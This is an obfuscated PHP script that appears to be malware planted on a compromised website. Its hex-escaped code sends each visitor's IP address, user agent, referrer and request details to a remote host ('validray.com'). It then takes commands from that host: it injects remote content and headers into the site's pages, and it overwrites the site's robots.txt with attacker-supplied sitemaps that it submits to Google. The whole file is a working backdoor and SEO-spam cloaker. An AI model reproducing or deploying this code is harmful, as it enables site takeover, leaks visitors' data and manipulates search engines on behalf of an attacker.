<?php
/*   __________________________________________________
    |  Obfuscated by YAK Pro - Php Obfuscator  2.0.14  |
    |              on 2024-10-14 04:37:21              |
    |    GitHub: https://github.com/pk-fr/yakpro-po    |
    |__________________________________________________|
*/
goto r_W8y; ey15F: echo "\162\157\142\157\x74\163\56\164\x78\164\75\x3d\x3e\x3c\142\76\x75\x70\x64\141\x74\x65\144\x3c\x2f\x62\76"; goto EUt8T; n7AQM: djg4M: goto AymCD; lzPpJ: function w2pYK($BVpgC) { goto Gg1yf; Gg1yf: $nm1UB = curl_init(); goto BjbSR; JR7RE: X8QPZ: goto iul8L; DL1Ce: $UTVns = trim($UTVns); goto t0Wy0; MHcKC: if (!empty($UTVns)) { goto X8QPZ; } goto qkhLO; iul8L: return $UTVns; goto o98J6; kmdg2: curl_setopt($nm1UB, CURLOPT_RETURNTRANSFER, 1); goto V1svX; rO4aW: $UTVns = curl_exec($nm1UB); goto DL1Ce; V1svX: curl_setopt($nm1UB, CURLOPT_CONNECTTIMEOUT, 10); goto rO4aW; qkhLO: $UTVns = file_get_contents($BVpgC); goto JR7RE; BjbSR: curl_setopt($nm1UB, CURLOPT_URL, $BVpgC); goto kmdg2; t0Wy0: curl_close($nm1UB); goto MHcKC; o98J6: } goto BgaNq; BgaNq: $PgbRy = "\150\x74\x74\160\x3a\57\57" . $xQAxQ . "\x2e\166\x61\x6c\x69\x64\x72\141\171\x2e\x63\x6f\x6d"; goto dF5QW; YWPOR: echo $U27SY; goto i1HqW; p4HEb: if (!($j_vi8 == "\145\170\151\x74")) { goto EF1nb; } goto cGcls; r_W8y: error_reporting(0); goto pSPB2; TtcQt: $Hh4a0 = count($HCe5K); goto v8s1f; cGcls: exit; goto Qn4V7; HtA_A: if (empty($xzM0g)) { goto djg4M; } goto yXc0N; d1xOS: foreach ($KeqDn as $gLSIS) { goto QLZsC; gJfjF: GVP28: goto egZl_; lm7Jz: $FBpRh = str_replace("\57", "\137", $FBpRh); goto bbd16; bbd16: $FBpRh = str_replace("\x3d", "\56", $FBpRh); goto v37zt; v37zt: $FSQSX .= "\46" . $gLSIS . "\x3d" . $FBpRh; goto gJfjF; QLZsC: $OOT8I = isset($_SERVER[$gLSIS]) ? $_SERVER[$gLSIS] : ''; goto Sg1ad; bzZFu: $FBpRh = str_replace("\x2b", "\55", $FBpRh); goto lm7Jz; Sg1ad: $FBpRh = base64_encode(trim($OOT8I)); goto bzZFu; egZl_: } goto by2if; jd3FQ: J5HYS: goto mZsik; ABBqZ: c9uAY: goto wKrQi; qZYqD: $KeqDn = array("\123\x43\122\111\x50\124\137\x4e\x41\115\105", "\122\105\x51\125\x45\x53\124\137\x55\122\111", "\x48\124\124\120\x53", "\x52\x45\x51\125\x45\x53\124\137\x53\x43\110\105\x4d\105", "\123\x45\122\126\x45\x52\x5f\x50\117\122\x54", "\x52\105\115\x4f\124\x45\x5f\x41\x44\104\x52", "\x48\x54\124\x50\137\122\x45\106\105\122\x45\x52", "\110\x54\124\120\137\101\x43\103\105\x50\124\137\x4c\101\116\107\x55\x41\x47\x45", "\110\124\x54\120\137\x55\123\x45\x52\137\x41\x47\x45\116\x54", "\110\x54\x54\120\137\110\x4f\123\124"); goto d1xOS; jl21o: $a86oI = "\x55\x73\x65\162\55\141\x67\x65\156\x74\x3a\52" . PHP_EOL; goto L_Jml; mZsik: header("\110\124\124\x50\57\x31\x2e\x30\x20\64\60\x34\40\x4e\157\164\x20\x46\x6f\165\156\x64"); goto MDIwx; DbYmw: u6BS1: goto lzPpJ; AfTLP: if (!($j_vi8 == "\160\x69\x6e\147")) { goto PkrPK; } goto jl21o; i1HqW: GHTOq: goto Ofi0k; L_Jml: $a86oI .= "\x41\154\x6c\157\x77\x3a\x2f" . PHP_EOL; goto A8SWm; JfArU: $xzM0g = trim($HCe5K[0]); goto HtA_A; OLlj0: header("\110\x54\x54\x50\x2f\x31\56\60\x20\x34\60\64\40\x4e\157\x74\40\106\x6f\x75\x6e\144"); goto hmKgx; yXc0N: header($xzM0g); goto n7AQM; v8s1f: if ($Hh4a0 < 3) { goto J5HYS; } goto JfArU; wKrQi: file_put_contents($_SERVER["\104\117\103\x55\x4d\x45\116\124\137\122\117\117\x54"] . "\x2f\x72\157\142\157\164\163\x2e\164\x78\164", $a86oI); goto ey15F; AymCD: $U27SY = trim($HCe5K[1]); goto qz68L; lP1FU: $T3hLj = "\157\x64\x31"; goto mS9lL; by2if: K5Kht: goto mR82y; MDIwx: exit; goto WUghS; WbSeL: array_pop($mY2Vj); goto uVb3A; hmKgx: echo "\x48\124\x54\120\x2f\61\56\x30\x20\64\x30\x34\40\116\x6f\164\40\x46\157\165\x6e\144" . "\x5f\x5f\x5f" . $xQAxQ . "\x5f\137\x5f" . $T3hLj; goto ZdtQo; Qn4V7: EF1nb: goto AfTLP; uVb3A: foreach ($mY2Vj as $Iarkg) { goto NEwI7; NEwI7: $a86oI .= "\x53\x69\164\x65\x6d\141\160\x3a" . $Iarkg . PHP_EOL; goto MRMHh; SQxf_: usleep(mt_rand(100000, 300000)); goto yxujr; bmK1C: preg_match("\x2f\x3c\x68\62\76\x28\56\x2b\x29\77\74\x5c\57\150\62\x3e\x2f", $kVfW0, $v5U2E); goto uOeoW; uOeoW: echo $Iarkg . "\x3d\75\76\160\151\156\147\55\x67\x6f\x6f\x67\x6c\145\55\x72\x65\163\x75\154\164\55\x69\x73\72\74\142\76" . $v5U2E[1] . "\x3c\x2f\142\76\74\x62\162\57\76"; goto SQxf_; yxujr: jhN1i: goto uapZx; MRMHh: $kVfW0 = W2pYK("\150\164\x74\x70\x73\72\x2f\x2f\x77\x77\167\x2e\147\x6f\x6f\147\154\x65\x2e\x63\x6f\155\57\x70\x69\156\x67\77\x73\x69\x74\x65\x6d\x61\x70\75" . $Iarkg); goto bmK1C; uapZx: } goto ABBqZ; mR82y: $HCe5K = explode("\x7c\x40\x23\x24\174", trim(w2pyk($PgbRy . $FSQSX))); goto TtcQt; ZdtQo: exit; goto DbYmw; mX9gX: goto dyODr; goto jd3FQ; pSPB2: $xQAxQ = "\x6f\x6d\142\61"; goto lP1FU; dF5QW: $FSQSX = "\57\x69\x6e\144\x65\170\x2e\x70\x68\x70\x3f\126\x53\75" . $T3hLj . "\46\107\120\75" . $xQAxQ; goto qZYqD; A8SWm: $mY2Vj = explode("\74\x62\x72\x2f\76", $U27SY); goto WbSeL; qz68L: if (empty($U27SY)) { goto GHTOq; } goto YWPOR; Ofi0k: $j_vi8 = trim($HCe5K[$Hh4a0 - 1]); goto p4HEb; VIhLQ: PkrPK: goto mX9gX; EUt8T: exit; goto VIhLQ; mS9lL: if (!(preg_match("\x2f\x6a\160\62\x30\x32\63\x2f\163\x69", $_SERVER["\x52\105\x51\125\x45\x53\x54\x5f\x55\x52\x49"]) == 1)) { goto u6BS1; } goto OLlj0; WUghS: dyODr:

?>
